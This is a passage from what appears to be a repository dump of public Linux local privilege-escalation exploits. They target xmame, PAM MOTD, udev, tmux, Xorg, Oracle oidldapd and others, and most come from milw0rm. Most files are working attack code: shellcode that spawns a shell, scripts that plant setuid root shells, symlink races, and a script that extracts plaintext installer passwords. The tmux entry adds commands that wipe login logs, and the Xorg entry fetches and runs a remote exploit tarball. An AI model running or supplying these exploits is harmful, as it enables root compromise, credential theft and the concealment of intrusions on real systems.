bytes. 18 | shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+ 19 | "\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+ 20 | "\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+ 21 | "\x31\xdb\xcd\x80" 22 | 23 | vulnpath = "/usr/games/xmame.x11" 24 | argvopt = "-lang" 25 | 26 | ret = (0xbfffe8da) 27 | retadd = ([ret].pack('V')) 28 | 29 | nops = ("\x90" * (1056 - (shellcode.length + retadd.length))) 30 | buffer = nops+shellcode+retadd 31 | 32 | system(vulnpath,argvopt,buffer) 33 | 34 | # milw0rm.com [2006-01-10] 35 | -------------------------------------------------------------------------------- /linux/linux_exploits/1415.c: -------------------------------------------------------------------------------- 1 | /* 2 | Xmame 0.102 (-lang) Local Buffer Overflow Exploit 3 | Coded BY Qnix 4 | Qnix@bsdmail.org 5 | #0x11 @EFNET 6 | icq : 234263 7 | 0x11.org 8 | Advisory : http://kerneltrap.org/node/6055 9 | 10 | e.g: 11 | 12 | Qnix ~ # ./exploit /usr/games/bin/xmame.x11 13 | ************************************************** 14 | Xmame 0.102 (-lang) Local Buffer Overflow Exploit 15 | Coded BY Qnix 16 | ************************************************** 17 | 18 | (~) Stack pointer (ESP) : 0xbffff688 19 | (~) Offset from ESP : 0x0 20 | (~) Desired Return Addr : 0xbffff688 21 | 22 | GLINFO: loaded OpenGL library libGL.so! 23 | GLINFO: loaded GLU library libGLU.so! 24 | GLINFO: glPolygonOffsetEXT (2): not implemented ! 25 | info: trying to parse: /usr/share/games/xmame/xmamerc 26 | info: trying to parse: /root/.xmame/xmamerc 27 | info: trying to parse: /usr/share/games/xmame/xmame-x11rc 28 | info: trying to parse: /root/.xmame/xmame-x11rc 29 | info: trying to parse: /usr/share/games/xmame/rc/robbyrc 30 | info: trying to parse: /root/.xmame/rc/robbyrc 31 | sh-3.00# 32 | 33 | */ 34 | 35 | #include 36 | #include 37 | 38 | #define BUFSIZE 1057 39 | #define NS 600 40 | 41 | char shellcode[] = 42 | "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" 43 | "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" 44 | "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" 45 | "\x68"; 46 | 47 | unsigned long sp(void) 48 | { __asm__("movl %esp, %eax");} 49 | 50 | int main(int argc, char *argv[]) 51 | { 52 | int i, offset; 53 | long esp, ret, *addr_ptr; 54 | char *buffer, *ptr; 55 | 56 | offset = 0; 57 | esp = sp(); 58 | ret = esp - offset; 59 | 60 | if(argc < 2 || argc != 2) 61 | { 62 | fprintf(stderr,"%s \n",argv[0]); 63 | return(0); 64 | } 65 | 66 | fprintf(stdout,"**************************************************\n"); 67 | fprintf(stdout,"Xmame 0.102 (-lang) Local Buffer Overflow Exploit\n"); 68 | fprintf(stdout,"Coded BY Qnix\n"); 69 | fprintf(stdout,"**************************************************\n\n"); 70 | fprintf(stdout,"\t(~) Stack pointer (ESP) : 0x%x\n", esp); 71 | fprintf(stdout,"\t(~) Offset from ESP : 0x%x\n", offset); 72 | fprintf(stdout,"\t(~) Desired Return Addr : 0x%x\n\n", ret); 73 | 74 | buffer = malloc(BUFSIZE); 75 | 76 | ptr = buffer; 77 | addr_ptr = (long *) ptr; 78 | for(i=0; i < BUFSIZE; i+=4) 79 | { *(addr_ptr++) = ret; } 80 | 81 | for(i=0; i < NS; i++) 82 | { buffer[i] = '\x90'; } 83 | 84 | ptr = buffer + NS; 85 | for(i=0; i < strlen(shellcode); i++) 86 | { *(ptr++) = shellcode[i]; } 87 | 88 | buffer[BUFSIZE-1] = 0; 89 | 90 | execl(argv[1], "xmame.x11", "-lang", buffer, 0); 91 | 92 | free(buffer); 93 | 94 | return(0); 95 | 96 | } 97 | 98 | // milw0rm.com [2006-01-13] 99 | -------------------------------------------------------------------------------- /linux/linux_exploits/14273.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation) 4 | # Date: July 7, 2010 5 | # Author: Kristian Erik Hermansen 6 | # Software Link: http://packages.ubuntu.com/ 7 | # Version: pam-1.1.0 8 | # Tested on: Ubuntu 10.04 LTS (Lucid Lynx) 9 | # CVE : CVE-2010-0832 10 | # 11 | # Notes: Affects Ubuntu 9.10 and 10.04 LTS 12 | # [Patch Instructions] 13 | # $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i 14 | # 15 | 16 | if [ $# -eq 0 ]; then 17 | echo "Usage: $0 /path/to/file" 18 | exit 1 19 | fi 20 | 21 | mkdir $HOME/backup 2> /dev/null 22 | tmpdir=$(mktemp -d --tmpdir=$HOME/backup/) 23 | mv $HOME/.cache/ $tmpdir 2> /dev/null 24 | echo "\n@@@ File before tampering ...\n" 25 | ls -l $1 26 | ln -sf $1 $HOME/.cache 27 | echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\n" 28 | -------------------------------------------------------------------------------- /linux/linux_exploits/144.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem." 6 | #define START 1 7 | #define END 33000 8 | 9 | int main(int argc, char **argv) 10 | { 11 | int i; 12 | char buf[150]; 13 | 14 | printf("\tSuSE 9.0 YaST script 15 | SuSEconfig.gnome-filesystem exploit\n"); 16 | printf("\t------------------------------------------------------------- 17 | \n"); 18 | printf("\tdiscovered and written by l0om 19 | \n"); 20 | printf("\t WWW.EXCLUDED.ORG\n\n"); 21 | 22 | if(argc != 2) { 23 | printf("usage: %s \n",argv[0]); 24 | exit(0xff); 25 | } 26 | 27 | printf("### hit enter to create or overwrite file % 28 | s: ",argv[1]); fflush(stdout); 29 | read(1, buf, 1); fflush(stdin); 30 | 31 | umask(0000); 32 | printf("working\n\n"); 33 | for(i = START; i < END; i++) { 34 | snprintf(buf, sizeof(buf),"%s%d",PATH,i); 35 | if(mkdir(buf,00777) == -1) { 36 | fprintf(stderr, "cannot creat directory [Nr.%d] 37 | \n",i); 38 | exit(0xff); 39 | } 40 | if(!(i%1000))printf("."); 41 | strcat(buf, "/found"); 42 | if(symlink(argv[1], buf) == -1) { 43 | fprintf(stderr, "cannot creat symlink from %s to %s 44 | [Nr.%d]\n",buf,argv[1],i); 45 | exit(0xff); 46 | } 47 | } 48 | printf("\ndone!\n"); 49 | printf("next time the SuSE.gnome-filesystem script 50 | gets executed\n"); 51 | printf("we will create or overwrite file %s 52 | \n",argv[1]); 53 | return(0x00); 54 | } /* i cant wait for the new gobbles comic!! */ 55 | 56 | // milw0rm.com [2004-01-15] 57 | -------------------------------------------------------------------------------- /linux/linux_exploits/1445.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/1445.c -------------------------------------------------------------------------------- /linux/linux_exploits/1449.c: -------------------------------------------------------------------------------- 1 | /* 2 | Change passwd 3.1 (SquirrelMail plugin ) 3 | 4 | Coded by rod hedor 5 | 6 | web-- http://lezr.com 7 | 8 | [local exploit] 9 | 10 | * Multiple buffer overflows are present in the handling of command line arguements in chpasswd. 11 | The bug allows a hacker to exploit the process to run arbitrary code. 12 | */ 13 | 14 | #include 15 | #include 16 | 17 | const char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90" 18 | "\x90\x90\x90\x90\x90\x90\x90\x90" 19 | "\x90\x90\x90\x90\x90\x90\x90\x90" 20 | "\x31\xc0\xb0\x17\x31\xdb\xcd\x80" 21 | "\x89\xe5\x31\xc0\x50\x55\x89\xe5" 22 | "\x50\x68\x6e\x2f\x73\x68\x68\x2f" 23 | "\x2f\x62\x69\x89\xe3\x89\xe9\x89" 24 | "\xea\xb0\x0b\xcd\x80"; 25 | 26 | long get_sp(){ 27 | __asm__("movl %esp,%eax;"); 28 | }; 29 | 30 | int main(){ 31 | char buffer[1024]; 32 | long stack = get_sp(); 33 | int result = 1; 34 | long offset = 0; 35 | printf ("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n"); 36 | printf ("[+] Current stack [0x%x]\n",stack); 37 | while(offset <= 268435456){ 38 | offset = offset + 1; 39 | stack = get_sp() + offset; 40 | memcpy(&buffer,"EGG=",4); 41 | int a = 4; 42 | while(a <= 108){ 43 | memcpy(&buffer[a],"x",1); 44 | a = a + 1;} 45 | memcpy(&buffer[108],&stack,4); 46 | memcpy(&buffer[112],&shellcode,sizeof(shellcode)); 47 | putenv(buffer); 48 | result = system("./chpasswd $EGG"); 49 | if(result == 0){exit(0);}; 50 | }; 51 | }; 52 | 53 | // milw0rm.com [2006-01-25] 54 | -------------------------------------------------------------------------------- /linux/linux_exploits/15074.sh: -------------------------------------------------------------------------------- 1 | Source: http://www.securityfocus.com/bid/43084/info 2 | 3 | #!/bin/sh 4 | # by fuzz. For Anux inc. # 5 | # ubuntu 10.04 , 10.10 6 | if [ -z "$1" ] 7 | then 8 | echo "usage: $0 " 9 | echo "see here http://www.reactivated.net/writing_udev_rules.html" 10 | exit 11 | fi 12 | cat > usn985-exploit.sh << EOF 13 | #!/bin/sh 14 | chown root:root $PWD/usn985-sc 15 | chmod +s $PWD/usn985-sc 16 | EOF 17 | cat > usn985-sc.c << EOF 18 | char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68" 19 | "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; 20 | main(){int *r;*((int *)&r+2)=(int)s;} 21 | EOF 22 | gcc usn985-sc.c -o usn985-sc 23 | echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules 24 | chmod +x usn985-exploit.sh 25 | echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)" 26 | echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root" -------------------------------------------------------------------------------- /linux/linux_exploits/154.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Proof-of-concept exploit code for do_mremap() #2 3 | * 4 | * Copyright (C) 2004 Christophe Devine 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | 28 | 29 | #define MREMAP_MAYMOVE 1 30 | #define MREMAP_FIXED 2 31 | 32 | 33 | #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED 34 | 35 | 36 | #define __NR_real_mremap __NR_mremap 37 | 38 | 39 | static inline _syscall5( void *, real_mremap, void *, old_address, 40 | size_t, old_size, size_t, new_size, 41 | unsigned long, flags, void *, new_address ); 42 | 43 | 44 | #define VMA_SIZE 0x00003000 45 | 46 | 47 | int main( void ) 48 | { 49 | int i, ret; 50 | void *base0; 51 | void *base1; 52 | 53 | 54 | i = 0; 55 | 56 | 57 | while( 1 ) 58 | { 59 | i++; 60 | 61 | 62 | ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), 63 | VMA_SIZE, PROT_READ | PROT_WRITE, 64 | MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); 65 | 66 | 67 | if( ret == -1 ) 68 | { 69 | perror( "mmap" ); 70 | break; 71 | } 72 | 73 | 74 | base0 = base1; 75 | base1 = (void *) ret; 76 | } 77 | 78 | 79 | printf( "created ~%d VMAs\n", i ); 80 | 81 | 82 | base0 += 0x1000; 83 | base1 += 0x1000; 84 | 85 | 86 | printf( "now mremapping 0x%08X at 0x%08X\n", 87 | (int) base1, (int) base0 ); 88 | 89 | 90 | real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); 91 | 92 | 93 | printf( "kernel may not be vulnerable\n" ); 94 | 95 | 96 | return( 0 ); 97 | } 98 | 99 | 100 | // milw0rm.com [2004-02-18] 101 | -------------------------------------------------------------------------------- /linux/linux_exploits/15620.sh: -------------------------------------------------------------------------------- 1 | CVE-2010-4170 2 | 3 | printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever 4 | 5 | 6 | RHEL Advisory: 7 | https://rhn.redhat.com/errata/RHSA-2010-0894.html -------------------------------------------------------------------------------- /linux/linux_exploits/1579.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use warnings; 4 | use strict; 5 | 6 | ############################################################################## 7 | # Author: Kristian Hermansen 8 | # Date: 3/12/2006 9 | # Overview: Ubuntu Breezy stores the installation password in plain text 10 | # Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606 11 | ############################################################################## 12 | 13 | print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; 14 | print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n"; 15 | print "99% effective, thank your local admin ;-)\n"; 16 | print "FOR EDUCATIONAL PURPOSES ONLY!!!\n"; 17 | print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; 18 | 19 | # the two vulnerable files 20 | my $file1 = "/var/log/installer/cdebconf/questions.dat"; 21 | my $file2 = "/var/log/debian-installer/cdebconf/questions.dat"; 22 | 23 | print "Checking if an exploitable file exists..."; 24 | if ( (-e $file1) || (-e $file2) ) 25 | { 26 | print "Yes\nNow checking if readable..."; 27 | if ( -r $file1 ) 28 | { 29 | getinfo($file1); 30 | } 31 | else 32 | { 33 | if ( -r $file2 ) { 34 | getinfo($file2); 35 | } 36 | else { 37 | print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n"; 38 | exit(-2); 39 | } 40 | } 41 | } 42 | else 43 | { 44 | print "No\nFile may have been deleted by the administrator :-(\nExiting...\n"; 45 | exit(-1); 46 | } 47 | 48 | sub getinfo { 49 | my $fn = shift; 50 | print "Yes\nHere come the details...\n\n"; 51 | my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`; 52 | my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`; 53 | my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`; 54 | chomp($realname); 55 | chomp($user); 56 | chomp($pass); 57 | print "Real Name: $realname\n"; 58 | print "Username: $user\n"; 59 | print "Password: $pass\n"; 60 | } 61 | 62 | # milw0rm.com [2006-03-12] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/1591.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # gexp-python.py 4 | # 5 | # Python <= 2.4.2 realpath() Local Stack Overflow 6 | # ----------------------------------------------- 7 | # Against VA Space Randomization. 8 | # 9 | # Copyright (c) 2006 Gotfault Security 10 | # 11 | # Bug found and developed by: dx/vaxen (Gotfault Security), 12 | # posidron (Tripbit Research Group). 13 | # Enviroment: 14 | # 15 | # Kernel Version : 2.6.12.5-vs2.0 16 | # GCC Version : 4.0.3 17 | # Libc Version : 2.3.5 18 | # 19 | # Special greets goes to : posidron from tripbit.net 20 | # RFDSLabs, barros, izik, 21 | # Gotfault Security Community. 22 | # 23 | # Original Reference: 24 | # http://gotfault.net/research/exploit/gexp-python.py 25 | 26 | import os 27 | 28 | # JMP *%ESP @ linux-gate.so.1 29 | jmp = "\x5f\xe7\xff\xff" 30 | 31 | shell = "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e" 32 | shell += "\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3" 33 | shell += "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" 34 | shell += "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" 35 | 36 | os.chdir("/tmp") 37 | base = os.getcwd() 38 | dir = os.path.join("A"*250, "A"*250, "A"*250, "A"*250, "A"*42, jmp+shell) 39 | os.makedirs(dir) 40 | os.chdir(dir) 41 | 42 | os.system('> vuln.py; python vuln.py') 43 | os.remove("vuln.py") 44 | os.chdir(base) 45 | os.removedirs(dir) 46 | 47 | # milw0rm.com [2006-03-18] 48 | -------------------------------------------------------------------------------- /linux/linux_exploits/1596.txt: -------------------------------------------------------------------------------- 1 | # From Daniel Stone's Advisory 2 | # xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates 3 | # of X11R7.0, is vulnerable. 4 | # X11R6.9.0, and all release candidates, are vulnerable. 5 | # X11R6.8.2 and earlier versions are not vulnerable. 6 | 7 | # The rest is H D Moore from metasploit 8 | 9 | Two second exploit, but if anyone is lazy: 10 | 11 | $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz 12 | $ tar -zpxvf xmodulepath.tgz 13 | $ cd xmodulepath 14 | $ ./root.sh 15 | /bin/rm -f exploit.o exploit.so shell *.o *.so 16 | gcc -fPIC -c exploit.c 17 | gcc -shared -nostdlib exploit.o -o exploit.so 18 | gcc -o shell shell.c 19 | 20 | X Window System Version 7.0.0 21 | Release Date: 21 December 2005 22 | X Protocol Version 11, Revision 0, Release 7.0 23 | [ snip ] 24 | r00t # id 25 | uid=0(root) gid=100(users) groups=10(wheel),18(audio)... 26 | 27 | # backup: http://www.exploit-db.com/sploits/xmodulepath.tgz 28 | 29 | # milw0rm.com [2006-03-20] 30 | -------------------------------------------------------------------------------- /linux/linux_exploits/15974.txt: -------------------------------------------------------------------------------- 1 | Source: http://www.securityfocus.com/bid/45051/info 2 | 3 | Mono and Moonlight is prone to a local privilege-escalation vulnerability. 4 | 5 | Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. 6 | 7 | PoC: 8 | 9 | using System; 10 | using System.Reflection; 11 | using System.Runtime.InteropServices; 12 | 13 | public class DelegateWrapper { 14 | public IntPtr method_ptr; 15 | } 16 | 17 | public delegate void MethodWrapper (); 18 | 19 | public class BreakSandbox { 20 | private static DelegateWrapper Convert (T dingus) where T : 21 | DelegateWrapper { 22 | return dingus; 23 | } 24 | 25 | private static DelegateWrapper ConvertDelegate (Delegate del) { 26 | var m = typeof (BreakSandbox).GetMethod ("Convert", 27 | BindingFlags.NonPublic | BindingFlags.Static); 28 | var gm = m.MakeGenericMethod (typeof (Delegate)); 29 | 30 | var d = (Func ) Delegate.CreateDelegate 31 | (typeof (Func ), null, gm); 32 | 33 | return d (del); 34 | } 35 | 36 | public static void Main (string [] args) { 37 | MethodWrapper d = delegate { 38 | Console.WriteLine ("Hello"); 39 | }; 40 | 41 | d (); 42 | var converted = ConvertDelegate (d); 43 | // Overwrite the already WX page with a 'ret' 44 | Marshal.WriteByte (converted.method_ptr, (byte) 0xc3); 45 | d (); 46 | } 47 | } 48 | 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/17083.pl: -------------------------------------------------------------------------------- 1 | # Exploit Title: HT Editor File openning Stack Overflow (0day) 2 | # Date: March 30th 2011 3 | # Author: ZadYree 4 | # Software Link: http://hte.sourceforge.net/downloads.html 5 | # Version: <= 2.0.18 6 | # Tested on: Linux/Windows (buffer padding may differ on W32) 7 | # CVE : None 8 | 9 | #!/usr/bin/perl 10 | =head1 TITLE 11 | 12 | HT Editor <=2.0.18 0day Stack-Based Overflow Exploit 13 | 14 | 15 | =head2 SYNOPSIS 16 | 17 | my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; 18 | 19 | 20 | =head1 DESCRIPTION 21 | 22 | The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip. 23 | 24 | =head2 AUTHOR 25 | 26 | ZadYree ~ 3LRVS Team 27 | 28 | 29 | =head3 SEE ALSO 30 | 31 | ZadYree's blog: z4d.tuxfamily.org 32 | 33 | 3LRVS blog: 3lrvs.tuxfamily.org 34 | 35 | Shellcode based on http://www.shell-storm.org/shellcode/files/shellcode-606.php => Thanks 36 | =cut 37 | 38 | use strict; 39 | use warnings; 40 | 41 | use constant SHELLCODE => "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e". 42 | "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" . 43 | "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" . 44 | "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" . 45 | "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" . 46 | "\x53\x52\x54\x8a\xe2\xce\x81"; 47 | 48 | use constant NOPZ => ("\x90" x 3000); 49 | 50 | $ENV{'TAPZCODE'} = (NOPZ . SHELLCODE); 51 | 52 | open(my $fh, ">", "g3tenv.c"); 53 | print $fh <<"EOF"; 54 | #include 55 | void main() { 56 | printf("%x", getenv("TAPZCODE")); 57 | } 58 | EOF 59 | system("gcc g3tenv.c -o g3tenv"); 60 | my $retaddr = qx{./g3tenv}; 61 | 62 | my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; 63 | 64 | open(my $as, "<", "/proc/sys/kernel/randomize_va_space"); 65 | my $status = <$as>; 66 | close($as); 67 | unless ($status != 0) { 68 | unlink("g3tenv.c", "g3tenv"); 69 | exec(@$payload); 70 | } 71 | print "[*]ASLR detected!\012"; 72 | print "[*]Bruteforcing ASLR...\012"; 73 | while (1) { 74 | $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; 75 | qx{@$payload}; 76 | last unless ($? == 11); 77 | } 78 | unlink("g3tenv.c", "g3tenv"); 79 | die "HAPPY Hacking!"; 80 | -------------------------------------------------------------------------------- /linux/linux_exploits/17147.txt: -------------------------------------------------------------------------------- 1 | --------------------------------------- 2 | | Team ph0x90bic proudly presents | 3 | | tmux -S 1.3/1.4 local utmp exploit | 4 | --------------------------------------- 5 | 6 | # Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability 7 | # Date: 11.04.2011 8 | # Author: ph0x90bic 9 | # Software Link: http://tmux.sourceforge.net/ 10 | # Version: 1.3/1.4 11 | # Tested on: Linux debian 2.6.26-1-686 12 | # CVE : CVE-2011-1496 13 | 14 | --- 15 | 16 | INTRODUCTION 17 | 18 | tmux 1.3/1.4 contains a privilege escalation vulnerabillity, 19 | which gives you utmp group privileges. This bug is important, 20 | because it is possible to clean logfiles and use logcleaners 21 | for btmp, wtmp and lastlog without local root access. 22 | 23 | --- 24 | 25 | EXPLOIT 26 | 27 | Execute shell as utmp group 28 | 29 | $ tmux -S /tmp/.whateveryouwant -c id 30 | uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) 31 | 32 | $ tmux -S /tmp/.whateveryouwant -c /bin/sh 33 | $ id 34 | uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) 35 | 36 | -- 37 | 38 | Delete logfiles 39 | 40 | $ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog' 41 | $ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp' 42 | $ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp' 43 | 44 | -- 45 | 46 | Use logcleaner software 47 | 48 | $ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/180.c: -------------------------------------------------------------------------------- 1 | /* (linux/debian)gnomehack[v1.0.5] buffer overflow, by: v9[v9@fakehalo.org]. 2 | this will give you an egid=60(games) shell if gnomehack is sgid(=2755) games 3 | on debian/2.2, which has gnomehack. (this can also be applied to nethack) 4 | 5 | syntax: ./deb_gnomehack [offset] [alignment]. 6 | 7 | example: 8 | ------------------------------------------------- 9 | # ./deb_gnomehack 500 0 10 | [ (linux/debian)gnomehack[v1.0.5] buffer overflow, by: v9[v9@fakehalo.org]. ] 11 | [ return address: 0xbffff978, offset: 500, align: 0. ] 12 | sh-2.03$ id 13 | uid=1001(v9) gid=1001(v9) egid=60(games) groups=1001(v9) 14 | sh-2.03$ 15 | ------------------------------------------------- 16 | 17 | note: overflow exists in $NETHACKOPTIONS as well, like nethack. 18 | */ 19 | #define PATH "/usr/lib/games/gnomehack/gnomehack" // path to gnomehack. 20 | #define DEFAULT_OFFSET 500 // default offset. 21 | #define DEFAULT_ALIGN 0 // default alignment. 22 | static char exec[]= 23 | "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56" 24 | "\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80" 25 | "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; 26 | long esp(void){__asm__("movl %esp,%eax");} 27 | int main(int argc,char **argv){ 28 | char bof[300]; 29 | int i,offset,align; 30 | long ret; 31 | printf("[ (linux/debian)gnomehack[v1.0.5] buffer overflow, by: v9[v9@fakehalo." 32 | "org]. ]\n"); 33 | if(argc>1){offset=atoi(argv[1]);} 34 | else{offset=DEFAULT_OFFSET;} 35 | if(argc>2){ 36 | if(atoi(argv[2])>3||atoi(argv[2])<0){ 37 | printf("*** ignored argument alignment value: %s. (use 0-3)\n",argv[2]); 38 | align=DEFAULT_ALIGN; 39 | } 40 | else{align=atoi(argv[2]);} 41 | } 42 | else{align=DEFAULT_ALIGN;} 43 | ret=(esp()-offset); 44 | printf("[ return address: 0x%lx, offset: %d, align: %d. ]\n",ret,offset,align); 45 | for(i=align;i<300;i+=4){*(long *)&bof[i]=ret;} 46 | for(i=0;i<(250-strlen(exec));i++){*(bof+i)=0x90;} 47 | memcpy(bof+i,exec,strlen(exec)); 48 | setenv("HOME",bof,1); 49 | if(execlp(PATH,"gnomehack",0)){ 50 | printf("*** execution of %s failed. (check the path)\n",PATH); 51 | exit(-1); 52 | } 53 | } 54 | 55 | // milw0rm.com [2000-11-15] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/182.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # /sbin/restore exploit for rh6.2 4 | # 5 | # I did not find this weakness my self, all i did was 6 | # writing this script (and some more) to make it 7 | # automatic and easy to use. 8 | # 9 | # This exploit should work on all redhat 6.2 systems 10 | # with /sbin/restore not "fucked up". May work on other 11 | # distros too, but only tested successfully on rh6.2. 12 | # 13 | # Make sure that the $USER variable is set! If you aren't 14 | # sure, do a SET USER= before you start 15 | # the exploit! 16 | # 17 | # Please do NOT remove this header from the file. 18 | # 19 | 20 | echo "###########################################" 21 | echo "# /sbin/restore exploit for rh6.2 #" 22 | echo "# this file by nawok '00 #" 23 | echo "###########################################" 24 | echo " " 25 | echo "==> EXPLOIT STARTED, Wait..." 26 | echo "#!/bin/sh" >> /home/$USER/execfile 27 | echo "cp /bin/sh /home/$USER/sh" >> /home/$USER/execfile 28 | echo "chmod 4755 /home/$USER/sh" >> /home/$USER/execfile 29 | chmod 755 /home/$USER/execfile 30 | export TAPE=restorer:restorer 31 | export RSH=/home/$USER/execfile 32 | touch /tmp/1 33 | /sbin/restore -t /tmp/1 34 | rm -f /home/$USER/execfile 35 | echo "==> DONE! If everything went OK we will now enter rootshell..." 36 | echo "==> To check if its rooted, type 'whoami', or 'id'" 37 | echo "==> B-Bye, you are on your own now." 38 | /home/$USER/sh 39 | 40 | 41 | # milw0rm.com [2000-11-16] 42 | -------------------------------------------------------------------------------- /linux/linux_exploits/183.c: -------------------------------------------------------------------------------- 1 | /* 2 | Exploit Code for oidldapd in Oracle 8.1.6 (8ir2) for Linux. 3 | I tested in RH 6.2 and 6.1. This code is a bullshit (i know 4 | please no comments about ;-)). 5 | 6 | If someone exports this to Sparc please tell me. 7 | 8 | synopsis: buffer overflow in oidldapd 9 | impact: any user gain euid=oracle. 10 | 11 | Dedicated to PlazaSite guys. Klink Klink Team. Panxeta, Entrophy and others. 12 | */ 13 | 14 | #include 15 | #include 16 | 17 | #define DEFAULT_OFFSET 13 18 | #define DEFAULT_BUFFER_SIZE 700 19 | #define NOP 0x90 20 | #define ORACLE_HOME "/usr/local/oracle/app/oracle/product/8.1.6" 21 | 22 | char shellcode[] = 23 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 24 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 25 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 26 | 27 | unsigned long get_sp(void) { 28 | __asm__("movl %esp,%eax"); 29 | } 30 | 31 | void main(int argc, char *argv[]) { 32 | char *buff, *ptr,*name[3],environ[100],binary[120]; 33 | long *addr_ptr, addr; 34 | int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; 35 | int i; 36 | 37 | buff = malloc(bsize); 38 | addr = get_sp() - offset; 39 | ptr = buff; 40 | 